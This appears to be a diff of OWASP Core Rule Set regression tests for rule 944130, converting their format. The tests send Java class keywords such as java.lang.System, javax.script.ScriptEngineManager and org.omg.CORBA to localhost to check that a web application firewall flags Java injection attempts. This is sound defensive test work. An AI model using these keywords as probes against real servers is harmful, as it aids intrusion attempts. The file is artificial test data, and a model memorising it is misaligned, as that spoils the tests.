Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log: + expect_ids: [944130] + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log: + expect_ids: [944130] + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log: + expect_ids: [944130] + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log: + expect_ids: [944130] + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log: + expect_ids: [944130] + - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log: + expect_ids: [944130] + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log: + expect_ids: [944130] + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 